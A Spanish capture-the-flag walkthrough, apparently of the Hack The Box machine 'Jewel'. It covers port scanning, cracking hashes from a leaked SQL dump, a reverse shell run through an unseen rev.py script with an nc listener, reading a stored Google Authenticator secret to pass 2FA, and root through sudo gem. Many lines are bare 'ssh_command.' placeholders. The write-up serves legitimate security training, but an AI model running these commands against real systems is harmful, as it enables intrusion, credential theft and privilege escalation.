Jewel

Jewel


HTB Linux

nmap -A -p- -oA jewel 10.129.130.0 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA jewel 10.129.130.0

nmap -sU -O -p- -oA jewel-udp 10.129.130.0

nikto -h 10.129.130.0:80

ssh_command.

ssh_command.

whatweb http://10.129.130.0/8000

whatweb http://10.129.130.0:8080

ssh_command.

Nos dirigimos http://10.129.130.0:8080

ssh_command.

Nos dirigimos a http://10.129.130.0:8000/gitweb

ssh_command.

echo “10.129.130.0 mail.htb” | sudo tee -a /etc/hosts

ssh_command.

Bajamos el archivo tar.gz

ssh_command.

tar -xf git-5d6f436.tar.gz

ssh_command.

cd git-5d6f436

cat bd.sql | grep -E -i “user|pass|key” -C 2 | grep -E “bill|jennifer”

ssh_command.

cat bd.sql | grep -E -i “user|pass|key” -C 2 | grep -E “bill|jennifer” | awk ‘{print $2 ”:” $8}’

ssh_command.

https://github.com/mxrch/penglab

https://colab.research.google.com/github/mxrch/penglab/blob/master/penglab.ipynb

Cambiamos hashcat y rockyou con un valor de True

ssh_command.

Runtime->change Runtime type

ssh_command.

Agregamos el mode y los hashes al codigo

ssh_command.

hashcat -m 3200 -a 0 hashes /usr/share/wordlists/rockyou

El password es spongebob

ssh_command.

Nos registramos como un usuario nuevo

ssh_command.

Creamos el siguiente codigo y lo corremos

ssh_command.

ssh_command.

python3 rev.py 10.129.130.0 10.10.14.82 1234

nc -lvnp 1234

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

export TERM=xterm

ssh_command.

cd /home/bill

cat .google_authenticator

ssh_command.

https://addons.mozilla.org/en-US/firefox/addon/auth-helper/

Hacer click en Edit > New > Manual Entry y pone como issuer cualquier cosa y como codigo 2UQI3R52WFCLE6JTLDCSJYMJH4

El autenticador le genera un numero: En mi caso fue 444791 que se pone como Verification Code despues de usar spongebob como password

sudo gem open -e “/bin/sh -c /bin/sh” rdoc

ssh_command.

© 2025 Cu3rv0x